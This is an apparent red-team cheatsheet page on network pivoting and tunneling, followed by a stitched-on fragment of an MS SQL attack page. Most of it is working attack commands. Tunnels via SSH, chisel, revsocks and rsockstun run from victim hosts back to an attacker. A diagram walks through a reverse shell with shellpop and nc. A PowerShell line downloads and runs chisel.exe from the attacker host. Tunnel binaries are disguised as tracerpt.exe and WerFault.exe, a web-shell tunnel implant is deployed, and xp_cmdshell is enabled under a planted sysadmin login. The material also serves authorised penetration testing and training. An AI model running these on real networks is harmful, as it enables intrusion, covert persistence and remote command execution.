[PayloadsAllTheThings/Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md) * [https://www.programmersought.com/article/93593867459/](https://www.programmersought.com/article/93593867459/) * [https://xakep.ru/2020/09/08/windows-pivoting/](https://xakep.ru/2020/09/08/windows-pivoting/) * [https://github.com/anderspitman/awesome-tunneling](https://github.com/anderspitman/awesome-tunneling) Check if connections are allowed at a certain port (alternative to [nc.exe](https://eternallybored.org/misc/netcat/) and [powercat.ps1](https://github.com/besimorhino/powercat/blob/master/powercat.ps1) ): nc.ps1 Copy # Test-NetConnection -ComputerName 10.10.13.37 -Port 4444 $port = $args[0] $endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, $port) $listener = New-Object System.Net.Sockets.TcpListener $endpoint $listener.Start() Write-Host "Listening on port $port" while ($true) { $client = $listener.AcceptTcpClient() Write-Host "A client has connected" $client.Close() } Check if the machine can reach specific remote port when `Test-NetConnection` is not available ([1](https://stackoverflow.com/a/63500581/6253579) , [2](https://kimconnect.com/powershell-alternative-to-test-netconnection-for-legacy-windows/) ): Copy $ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x 'powershell (New-Object System.Net.Sockets.TcpClient("192.168.2.22", 445)).Connected' | grep -ai True Using [PortQryV2](https://www.microsoft.com/en-us/download/details.aspx?id=17148) : [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#ssh) SSH ---------------------------------------------------------------------------------- * [https://habr.com/ru/post/331348/](https://habr.com/ru/post/331348/) * [https://iximiuz.com/en/posts/ssh-tunnels/](https://iximiuz.com/en/posts/ssh-tunnels/) * [https://www.blackhillsinfosec.com/forwarding-traffic-through-ssh/](https://www.blackhillsinfosec.com/forwarding-traffic-through-ssh/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#local-vs-remote-port-forwarding) Local vs Remote Port Forwarding A cheatsheet for SSH Local/Remote Forwarding command syntax: * `-L 1111:127.0.0.1:2222`: the traffic is forwarded _from SSH client via SSH server_, so `1111` is listening on _client-side_ and traffic is sent to `2222` on _server-side_. * `-R 2222:127.0.0.1:1111`: the traffic is forwarded _from SSH server via SSH client_, so `2222` is listening on _server-side_ and traffic is sent to `1111` on _client-side_. Consider the following example. An attacker has root privileges on Pivot1. He creates the first SSH tunnel (remote port forwarding) to interact with a vulnerable web server on Pivot2. Then he exploits the vulnerability on Pivot2 and triggers it to connect back to Attacker via a reverse-shell (firewall is active, so he needs to pivot through port 443, which is allowed). After that the attacker performs PE on Pivot2 and gets root. Then he creates another tunnel (local port forwarding) over the first one to SSH into Pivot2 from Attacker. Finally, he forwards port 80 over two existing hops to reach another vulnerable web server on Victim. Notes: * `1` For SSH server to listen at `0.0.0.0` instead of `127.0.0.1`, the `GatewayPorts yes` must be set in `/etc/ssh/sshd_config`. * `1` With SSH (or Chisel, for example) **server** running on the Attacker the same can be achieved by doing **local** port forwarding instead of **remote**. Let's say we're doing a Remote Port Forwarding via SSH (with `GatewayPorts yes`) through ProxyChains like this: Then it's crucial to make sure that local connections are excluded from ProxyChains interception via the `localnet 127.0.0.0/255.0.0.0` option in `proxychains.conf`. Otherwise, traffic redirection from server's 192.168.1.11:80 to client's 127.0.0.1:8080 are captured by ProxyChains and never reach the client! ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#remote-dynamic-forwarding) Remote Dynamic Forwarding * Attacker's IP: `10.10.13.37` * Victims's IP: `10.10.13.38` An example how to safely set remote dynamic port forwarding (SOCKS) with a builin SSH client. Generate a dummy SSH key on Victim: Add `dummy_key.pub` contents to `authorized_keys` on Attacker with the following options: Connect to Attacker's SSH server from Victim: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#l2-vpn-over-ssh) L2 VPN over SSH * [\[YouTube\] HTB Business CTF 2022: Dirty Money - The Day Before](https://youtu.be/PexfXIrgocA?t=4993) Allow tunneling in SSH server config on Victim: Connect to Victim building a Ethernet tunnel: Enable tap interfaces on both ends: Put Victim's interface and tap into bridge: Get an IP address for tap on Attacker: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#socks-over-hardened-ssh) SOCKS over Hardened SSH * [\[YouTube\] HTB Business CTF 2022: Dirty Money - The Day Before](https://youtu.be/PexfXIrgocA?t=5528) With `AllowTcpForwarding` set to `no` it's also possible to establish a SOCKS connection through active SSH connection: [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#netsh-netfirewallrule) netsh / NetFirewallRule ------------------------------------------------------------------------------------------------------------------------ ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#rules) Rules Allow inbound traffic flow on port 5986/TCP: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#relay) Relay Add a relay between two machines (need to be local admin). Make any traffic hitting port **8443** on **0.0.0.0** to be redirected to **10.10.13.37** on port **443**: Show active relays: Remove a relay: [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#tcp-over-rdp) TCP over RDP ---------------------------------------------------------------------------------------------------- * [https://ijustwannared.team/2019/11/07/c2-over-rdp-virtual-channels/](https://ijustwannared.team/2019/11/07/c2-over-rdp-virtual-channels/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#xfreerdp--rdp2tcp) xfreerdp + rdp2tcp * [https://github.com/V-E-O/rdp2tcp](https://github.com/V-E-O/rdp2tcp) * [https://github.com/NotMedic/rdp-tunnel](https://github.com/NotMedic/rdp-tunnel) Reverse local port 9002 (on Victim) to local port 9001 on Attacker (good for reverse shells): Forward local port 9001 (on Attacker) to local port 9002 on Victim (good for bind shells): Reverse tunnel web access via SOCKS proxy: * [https://serverfault.com/a/361806/554483](https://serverfault.com/a/361806/554483) [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#tcp-over-smb) TCP over SMB ---------------------------------------------------------------------------------------------------- * [https://github.com/lexfo/rpc2socks](https://github.com/lexfo/rpc2socks) * [https://habr.com/ru/articles/460659/](https://habr.com/ru/articles/460659/) * [https://github.com/mis-team/rsockspipe](https://github.com/mis-team/rsockspipe) * [https://tishina.in/ops/sliver-forward-pivoting](https://tishina.in/ops/sliver-forward-pivoting) * [https://github.com/zimnyaa/smbsocks/](https://github.com/zimnyaa/smbsocks/) [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#tools) Tools -------------------------------------------------------------------------------------- * [https://github.com/ginuerzh/gost](https://github.com/ginuerzh/gost) * [https://github.com/sysdream/ligolo](https://github.com/sysdream/ligolo) * [https://github.com/nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng) * [https://github.com/friedrich/hans](https://github.com/friedrich/hans) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#proxychains4-proxychains-ng) proxychains4 (proxychains-ng) * [https://github.com/rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng) Install: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#graftcp) graftcp * [https://github.com/hmgle/graftcp](https://github.com/hmgle/graftcp) * [https://sysdig.com/blog/bypassing-network-detection-with-graftcp/](https://sysdig.com/blog/bypassing-network-detection-with-graftcp/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#sshuttle) sshuttle * [https://github.com/sshuttle/sshuttle](https://github.com/sshuttle/sshuttle) * [https://anubissec.github.io/How-To-Pivot-Into-Target-Network-With-SSH/#](https://anubissec.github.io/How-To-Pivot-Into-Target-Network-With-SSH/#) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#chisel) chisel * [https://github.com/jpillora/chisel/releases](https://github.com/jpillora/chisel/releases) * [https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel](https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html#chisel) * [https://gist.github.com/freshwind2004/c827e742285cdb9542403ff021486bb0](https://gist.github.com/freshwind2004/c827e742285cdb9542403ff021486bb0) * [https://github.com/zimnyaa/grpcssh](https://github.com/zimnyaa/grpcssh) [garble](https://ppn.snovvcra.sh/red-team/dev/golang#garble) [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fsnovvcra.sh%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=39de3028&sv=2)HTB{ Reddish }snovvcrash@gh-pages:~$ \_](https://snovvcrash.github.io/2020/03/17/htb-reddish.html#chisel-socks) * Attacker's IP: `10.10.13.37` * Victims's IP: `10.10.13.38` Reverse local port `1111` (on Victim) to local port `2222` (on Attacker): Socks5 proxy in server mode: Socks5 proxy in server mode when direct connection to Victim is not available (not relevant as Chisel supports socks5 in client mode now): Socks5 proxy in client mode: Quicky: #### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#other-chisel-variants) Other Chisel Variants * [https://github.com/shantanu561993/SharpChisel](https://github.com/shantanu561993/SharpChisel) * [https://github.com/latortuga71/SharpChisel-NG](https://github.com/latortuga71/SharpChisel-NG) * [https://medium.com/@shantanukhande/red-team-how-to-embed-golang-tools-in-c-e269bf33876a](https://medium.com/@shantanukhande/red-team-how-to-embed-golang-tools-in-c-e269bf33876a) * [https://github.com/m3rcer/Chisel-Strike](https://github.com/m3rcer/Chisel-Strike) * [https://github.com/nullsection/chisel-ng](https://github.com/nullsection/chisel-ng) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#revsocks) revsocks * [https://github.com/kost/revsocks](https://github.com/kost/revsocks) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#rsockstun) rsockstun * [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun) Quicky: #### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#powershell) PowerShell * [https://habr.com/ru/articles/453870/](https://habr.com/ru/articles/453870/) * [https://habr.com/ru/articles/453970/](https://habr.com/ru/articles/453970/) * [https://habr.com/ru/articles/454254/](https://habr.com/ru/articles/454254/) * [https://github.com/mis-team/rsockstun](https://github.com/mis-team/rsockstun) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#resocks) resocks * [https://github.com/RedTeamPentesting/resocks](https://github.com/RedTeamPentesting/resocks) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#neo-regeorg) (Neo-)reGeorg * [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) * [https://github.com/L-codes/Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg) Generate a tunnel implant and copy it to the Victim web server from `./neoreg_servers/tunnel*`: Connect to the implant (`.aspx`, for example): ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#ssf) ssf * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) Map shells to users: Telegram alers: +Tunnel \-Tunnel Ansible [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#services) Services -------------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#dev-tunnels) Dev Tunnels * [https://www.syonsecurity.com/post/devtunnels-for-c2](https://www.syonsecurity.com/post/devtunnels-for-c2) Don't forget to set `Cookie: *tunnel_phishing_protection=xxxxyyyy.euw` ### [](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#cloudflare-tunnels) Cloudflare Tunnels * [https://labs.jumpsec.com/putting-the-c2-in-c2loudflare/](https://labs.jumpsec.com/putting-the-c2-in-c2loudflare/) * [https://labs.jumpsec.com/bring-your-own-trusted-binary-byotb-bsides-edition/](https://labs.jumpsec.com/bring-your-own-trusted-binary-byotb-bsides-edition/) Last updated 4 months ago * [SSH](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#ssh) * [Local vs Remote Port Forwarding](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#local-vs-remote-port-forwarding) * [Remote Dynamic Forwarding](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#remote-dynamic-forwarding) * [L2 VPN over SSH](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#l2-vpn-over-ssh) * [SOCKS over Hardened SSH](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#socks-over-hardened-ssh) * [netsh / NetFirewallRule](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#netsh-netfirewallrule) * [Rules](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#rules) * [Relay](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#relay) * [TCP over RDP](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#tcp-over-rdp) * [xfreerdp + rdp2tcp](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#xfreerdp--rdp2tcp) * [TCP over SMB](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#tcp-over-smb) * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#tools) * [proxychains4 (proxychains-ng)](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#proxychains4-proxychains-ng) * [graftcp](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#graftcp) * [sshuttle](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#sshuttle) * [chisel](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#chisel) * [revsocks](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#revsocks) * [rsockstun](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#rsockstun) * [resocks](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#resocks) * [(Neo-)reGeorg](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#neo-regeorg) * [ssf](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#ssf) * [Services](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#services) * [Dev Tunnels](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#dev-tunnels) * [Cloudflare Tunnels](https://ppn.snovvcra.sh/pentest/infrastructure/pivoting-tunneling#cloudflare-tunnels) Copy Cmd > PortQry.exe –n -p tcp/udp/both -e -v Copy Attacker (10.10.13.37) Pivot1 (10.1.1.1) Pivot2 (10.2.2.2) Victim (10.3.3.3) ┌──────────────────────────────────────────────────────────────────────┐ ┌───────────────────────────────────────────────┐ ┌────────────────────────────────┐ ┌───────────────────┐ │ 22 │ │ │ │ │ │ │ │ 1. ssh -R 443:127.0.0.1:9001 root@10.1.1.1 ------------------------------► 10.1.1.1:22 │ │ │ │ │ │ │ │ │ │ │ │ │ │ 2. │ │ Listens 0.0.0.0:443 ("GatewayPorts yes") │ │ │ │ │ │ │ │ │ │ │ │ │ │ 3. │ │ ~C ssh> -L 9002:10.2.2.2:80 │ │ │ │ │ │ │ │ │ │ │ │ │ │ 4. Listens 127.0.0.1:9002 (to interact with web server 10.2.2.2:80) │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 5. shellpop -H 10.2.2.2 -P 443 --reverse --number 8 --base64 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 9001 over 10.1.1.1:22 │ │ 443 │ │ │ │ │ │ 6. rlwrap nc -lvnp 9001 ◄--- 127.0.0.1:9001 ◄----------------------------- 0.0.0.0:443 ◄───────────────────────────────┼──┼── Web server 10.2.2.2:80 │ │ │ │ │ │ │ │ │ │ │ │ 7. Got shell from 10.2.2.2 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 8. Got root on 10.2.2.2 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ~C ssh> -L 9003:127.0.0.1:1337 │ │ │ │ │ │ │ │ │ │ │ │ │ │ 9. Listens 127.0.0.1:9003 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 22 │ │ │ │ │ │ │ │ ssh -L 1337:127.0.0.1:22 root@10.2.2.2 ----------► 10.2.2.2:22 │ │ │ │ │ │ │ │ │ │ │ │ │ │ Listens 127.0.0.1:1337 │ │ │ │ │ │ │ │ │ │ │ │ │ │ 1337 over 10.1.1.1:22 │ │ 22 over 10.2.2.2:22 │ │ │ │ │ │ 10. ssh root@127.0.0.1 -p 9003 -------------------------------------------► 127.0.0.1:1337 ----------------------------------► 127.0.0.1:22 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ~C ssh> -L 9004:10.3.3.3:80 │ │ │ │ │ │ │ │ │ │ │ │ 11. Listens 127.0.0.1:9004 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 1337 over 10.1.1.1:22 │ │ 22 over 10.2.2.2:22 │ │ │ │ │ │ 12. curl http://127.0.0.1:9004/ ------------------------------------------► 127.0.0.1:1337 ----------------------------------► 127.0.0.1:22 ────────────────┼──┼─► 10.3.3.3:80 │ │ │ │ │ │ │ │ │ └──────────────────────────────────────────────────────────────────────┘ └───────────────────────────────────────────────┘ └────────────────────────────────┘ └───────────────────┘ Copy snovvcrash@attacker:~$ ./chisel server -p 8000 root@pivot1:# nohup ./chisel client 10.10.13.37:8000 443:127.0.0.1:9001 & root@pivot1:# netstat -tulpan | grep 443 tcp6 0 0 :::443 :::* LISTEN 18406/./chisel snovvcrash@attacker:~$ rlwrap nc -lvnp 9001 Copy $ proxychains ssh -R 80:127.0.0.1:8080 root@192.168.1.11 Copy alice@victim:~$ ssh-keygen -f dummy_key -t ed25519 -q -N "" Copy snovvcrash@attacker:~$ vi ~/.ssh/authorized_keys from="10.10.13.38",command="echo 'Only port forwarding is allowed'",no-agent-forwarding,no-X11-forwarding,no-pty Copy alice@victim:~$ ssh -fN -R 1080 -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -i dummy_key snovvcrash@10.10.13.37 Copy root@victim:~$ sudo vi /etc/ssh/sshd_config ...uncomment "PermitTunnel = yes"... root@victim:~$ sudo service sshd restart Copy snovvcrash@attacker:~$ sudo ssh -oTunnel=ethernet -w0:0 root@192.168.1.11 Copy root@victim:~$ sudo ip link set tap0 up snovvcrash@attacker:~$ sudo ip link set tap0 up Copy root@victim:~$ sudo ip link add br0 type bridge root@victim:~$ sudo ip link set eth0 master br0 root@victim:~$ sudo ip link set tap0 master br0 root@victim:~$ sudo ip link set br0 up Copy snovvcrash@attacker:~$ sudo dhclient -v tap0 Copy snovvcrash@attacker:~$ cat tunnel.sh ssh alice@victim "./socat TCP-LISTEN:2222,reuseaddr STDIO" snovvcrash@attacker:~$ socat TCP:localhost:22 EXEC:./tunnel.sh alive@victim:~$ ssh -R 1080 -p 2222 snovvcrash@attacker Copy Cmd > netsh advfirewall firewall add rule name="Windows Remote Management (HTTPS-In)" dir=in action=allow protocol=TCP localport=5986 Cmd > netsh advfirewall firewall delete rule name="Windows Remote Management (HTTPS-In)" PS > New-NetFirewallRule -DisplayName "Windows Remote Management (HTTPS-In)" -Direction Inbound -Action Allow -Protocol TCP -LocalPort 5986 PS > Remove-NetFirewallRule -DisplayName "Windows Remote Management (HTTPS-In)" Copy Cmd > netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8443 connectaddress=10.10.13.37 connectport=443 protocol=tcp Copy Cmd > netsh interface portproxy show v4tov4 Copy Cmd > netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8443 Copy $ xfreerdp /cert:ignore [/client-hostname:WORKGROUP] /u:snovvcrash /p:'Passw0rd!' [/d:megacorp.local] [/g:RDS-GATEWAY.megacorp.local] /v:PC01.megacorp.local /dynamic-resolution +clipboard [/timeout:25000] [/auth-pkg-list:!kerberos] [-sec-nla] [/drive:share,/home/snovvcrash/share] [/rdp2tcp:/home/snovvcrash/tools/rdp-tunnel/rdp2tcp] Copy $ python rdp2tcp.py add reverse 127.0.0.1 9001 127.0.0.1 9002 Copy $ python rdp2tcp.py add forward 127.0.0.1 9001 127.0.0.1 9002 Copy $ python rdp2tcp.py add socks5 127.0.0.1 1080 $ python rdp2tcp.py add reverse 127.0.0.1 1080 127.0.0.1 9003 Copy $ git clone https://github.com/rofl0r/proxychains-ng ~/tools/proxychains-ng && cd ~/tools/proxychains-ng $ ./configure --prefix=/usr --sysconfdir=/etc $ make $ sudo make install $ sudo make install-config + edit /etc/proxychains.conf Copy $ sshuttle -vr snovvcrash@10.10.13.37 192.168.1.0/24 -e "sshpass -p 'Passw0rd!' ssh" $ sshuttle -vr snovvcrash@10.10.13.37 192.168.1.0/24 -e "ssh -i ./key" Copy $ ./chisel server -p 8000 -v --reverse PS > (New-Object Net.WebClient).DownloadFile("http://10.10.13.37/chisel.exe", "$env:userprofile\music\chisel.exe") PS > Get-FileHash -Alg md5 "$env:userprofile\music\chisel.exe" PS > Start-Process -NoNewWindow -FilePath "$env:userprofile\music\chisel.exe" -ArgumentList "client 10.10.13.37:8000 R:127.0.0.1:2222:127.0.0.1:1111" or Cmd > [cmd /c] start "" /b chisel.exe ... Copy alice@victim:~$ nohup ./chisel server -p 8000 --socks5 & snovvcrash@kali:~$ ./chisel client 10.10.13.38:8000 [127.0.0.1:1080:]socks Copy snovvcrash@kali:~$ ./chisel server -p 8000 --reverse alice@victim:~$ nohup ./chisel client 10.10.13.37:8000 R:127.0.0.1:8001:127.0.0.1:8002 & alice@victim:~$ nohup ./chisel server -v -p 8002 --socks5 & snovvcrash@kali:~$ ./chisel client 127.0.0.1:8001 [127.0.0.1:1080:]socks Copy snovvcrash@kali:~$ ./chisel server -p 8000 --reverse --socks5 [--auth snovvcrash:'Passw0rd!'] alice@victim:~$ nohup ./chisel client [--fingerprint ] [--auth snovvcrash:'Passw0rd!'] 10.10.13.37:8000 R:[127.0.0.1:1080:]socks & Copy $ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"' $ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks $ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe' Copy snovvcrash@kali:~$ ./revsocks -listen :8000 -socks 127.0.0.1:1080 -pass 'Passw0rd!' alice@victim:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!' Copy $ openssl req -new -x509 -keyout cert.key -out cert.crt -days 365 -nodes $ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!' Copy $ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"' $ atexec.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe' Or get proc image first to make sure you're killing the right proc and kill by pid -- 'wmic process where "name='"'"'WerFault.exe'"'"'" get ProcessID, ExecutablePath' Copy $ git clone https://github.com/RedTeamPentesting/resocks ~/tools/resocks && cd ~/tools/resocks && go build $ export RESOCKS_KEY=`./resocks generate` $ CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w -H windowsgui -X main.defaultConnectBackAddress=10.10.13.37 -X main.defaultConnectionKey=$RESOCKS_KEY" $ ./resocks listen Copy $ python neoreg.py generate -k 'Passw0rd!' Copy $ python neoreg.py -k 'Passw0rd!' -u http://web01.megacorp.local/tunnel.aspx -l 0.0.0.0 -p 1337 [--skip] Copy for port in `netstat -tulpan | grep 127.0.0.1 | grep ssfd | awk '{print $4}' | awk -F: '{print $2}'`; do echo "127.0.0.1:$port"; (echo qwinsta | nc 127.0.0.1 $port & sleep 1 && kill -s INT $!) 2>/dev/null | grep -a console; done watch\_new\_sockets.sh Copy #!/bin/bash # * * * * * /tmp/watch_new_sockets.sh ssfd TOOL=$1 if [ "$(sudo netstat -tulpan | grep LIST | grep $TOOL | wc -l)" -gt 1 ]; then MESSAGE="new $TOOL tunnel spawned at $(curl -s ifconfig.me)" curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" -d chat_id="$CHAT_ID" -d text="$MESSAGE" >/dev/null fi watch\_live\_sockets.sh Copy #!/bin/bash # * * * * * /tmp/watch_live_sockets.sh ssfd PC01 TOOL=$1 LABEL=$2 if [ ! -f /tmp/.watchdog_ignore_sockets -a "$(sudo netstat -tulpan | grep LIST | grep $TOOL | wc -l)" -lt 3 ]; then MESSAGE="$TOOL tunnel died at $(curl -s ifconfig.me) ($LABEL)" curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" -d chat_id="$CHAT_ID" -d text="$MESSAGE" >/dev/null touch /tmp/.watchdog_ignore_sockets fi watch\_live\_sockets.yml Copy # ansible_run() { ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -u user --private-key ~/.ssh/id_ed25519 -i "$1," "${@:2}" } - name: Install Sockets Watchdog with TG Notifications hosts: all vars: watchdog_path: "/home/user/tools/watch_live_sockets.sh" pre_tasks: - name: Check Input Arguments fail: msg: >- Usage: ansible_run 127.0.0.1 watch_live_sockets.yml -e "tool=ssfd" -e "label=PC01" -e "token=" -e "chat_id=" when: tool is undefined or label is undefined or token is undefined or chat_id is undefined run_once: true - name: Upload Watchdog Script copy: dest: "{{ watchdog_path }}" content: | #!/bin/bash TOOL=$1 LABEL=$2 TOKEN=$3 CHAT_ID=$4 if [ ! -f /tmp/.watchdog_ignore_sockets -a "$(sudo netstat -tulpan | grep LIST | grep $TOOL | wc -l)" -lt 3 ]; then MESSAGE="$TOOL tunnel died at $(curl -s ifconfig.me) ($LABEL)" curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" -d chat_id="$CHAT_ID" -d text="$MESSAGE" >/dev/null touch /tmp/.watchdog_ignore_sockets fi mode: 0755 - name: Add Cron Job cron: name: "{{ tool }} tunnels watchdog" minute: "*" job: "{{ watchdog_path }} {{ tool }} {{ label }} {{ token }} {{ chat_id }}" Copy $ curl -sL https://aka.ms/DevTunnelCliInstall | bash $ ssh -L 0.0.0.0:443:localhost:8443 -N teamserver $ devtunnel host -p 443 --allow-anonymous --protocol https --- # MS SQL | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql.md) . Create a new login, map it to the `db_owner` user and assign the `sysadmin` role: Copy CREATE LOGIN [snovvcrash] WITH PASSWORD=N'Passw0rd!'; CREATE USER [snovvcrash] FOR LOGIN [snovvcrash]; ALTER ROLE [db_owner] ADD MEMBER [snovvcrash]; EXEC master..sp_addrolemember @rolename=N'db_owner', @membername=N'snovvcrash'; EXEC master..sp_addsrvrolemember @rolename=N'sysadmin', @loginame=N'snovvcrash'; EXEC master..sp_addremotelogin 'SQLSRV01\SQLEXPRESS', 'snovvcrash'; Check the state of `xp_cmdshell`: Copy SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'; Enable `xp_cmdshell`: Copy 1> EXEC sp_configure 'show advanced options', 1 2> GO 1> RECONFIGURE 2> GO 1> EXEC sp_configure 'xp_cmdshell', 1 2> GO 1> RECONFIGURE 2> GO 1> EXEC xp_cmdshell 'whoami' 2> GO [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#enumeration) Enumeration ------------------------------------------------------------------------------------------ Current login name (SQL Server login or Domain/Windows username, like `sa`): Current database username (like `msdb.dbo`): Test if current server role is `public` or `sysadmin`: List databases: List linked servers: List logins available for impersonation: [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#unc-path-injection) UNC Path Injection -------------------------------------------------------------------------------------------------------- * [https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e) * [https://0xdeaddood.rocks/2023/02/28/relaying-everything-coercing-authentications-episode-1-mssql/](https://0xdeaddood.rocks/2023/02/28/relaying-everything-coercing-authentications-episode-1-mssql/) [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#crawl-links) Crawl Links ------------------------------------------------------------------------------------------ * [https://blog.netspi.com/how-to-hack-database-links-in-sql-server/](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) * [https://blog.netspi.com/wp-content/uploads/2017/05/Technical-Article-Hacking-SQL-Server-Database-Links-Setup-and-Attack-Guide.pdf](https://blog.netspi.com/wp-content/uploads/2017/05/Technical-Article-Hacking-SQL-Server-Database-Links-Setup-and-Attack-Guide.pdf) * [https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server](https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server) * [https://xakep.ru/2020/01/24/lateral-movement/#toc01.](https://xakep.ru/2020/01/24/lateral-movement/#toc01.) Exec code from SQLSRV00 when SQLSRV01 and SQLSRV02 are linked like this SQLSRV00 -> SQLSRV01 -> SQLSRV02: Abusing server links from C# code: Crawl links with MSF: Crawl links with PowerUpSQL: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#ldap-enumeration-via-openquery) LDAP Enumeration via OpenQuery * [https://keramas.github.io//2020/03/28/mssql-ad-enumeration2.html](https://keramas.github.io//2020/03/28/mssql-ad-enumeration2.html) [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#external-scripts) External Scripts ---------------------------------------------------------------------------------------------------- * 